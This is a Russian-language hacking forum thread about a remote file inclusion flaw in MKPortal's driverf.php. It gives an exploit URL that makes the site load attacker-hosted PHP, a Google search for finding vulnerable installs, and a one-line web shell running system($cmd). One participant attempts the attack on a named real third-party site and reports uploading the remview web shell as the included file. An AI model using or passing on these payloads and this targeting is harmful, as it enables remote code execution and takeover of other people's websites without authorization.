внимание! в 1.0.1а это уже исправили

файл http://[target]/mkportal/include/driverf.php содержит
что-то вроде
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">require $MK_PATH."/conf_global.php";[/QUOTE]<span id='postcolor'>

эксплойт:
http://[target]/mkporta....TH=http (http://[target]/mkportal/include/driverf.php?MK_PATH=http://[hacker_site])

где:
http://[hacker_site]/conf_global.php
любой php код

http://www.google.ru/search?....%BA&lr= (http://www.google.ru/search?hl=ru&ie=UTF-8&q=MKPortal+1.0.1+Final&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=)

пхп-шная инъекция ?
Довольно частый случай:
http://www.site.ru/index.php&amp;se=сайт_с_кодом&amp;cmd=Коман ды (http://www.site.ru/index.php?se=сайт_с_кодом&cmd=Команды)

Хотелось бы добавить, что &quot;сайтом с кодом&quot; может являться любой сайт на народе со страничкой следующего содержания:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<PRE>
<H4>
<? system($cmd); ?>
</H4>
</PRE>
[/QUOTE]<span id='postcolor'>
Н-р: http://www.shutnicok.narod.ru/xak.php

кстати как видно из запроса в google
этот движок неплохо распостранился


интересно сколько на народе вот таких сайтов с загадочными файлами *.php =)

Блин, пишет вот что:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Fatal error: main(): Failed opening required 'http://hack-user.narod.ru/conf_global.php' (include_path='.:') in /membri/galassia/mkportal/include/driverf.php on line 20[/QUOTE]<span id='postcolor'>

А запрос делаю такой:
http://galassia.altervista.org/mkporta....TH=http (http://galassia.altervista.org/mkportal/include/driverf.php?MK_PATH=http://hack-user.narod.ruhttp://galassia.altervista.org/mkportal/include/driverf.php?MK_PATH=http://hack-user.narod.ru)

и ещё я загрузил remview на narod и переименовал в conf_global.php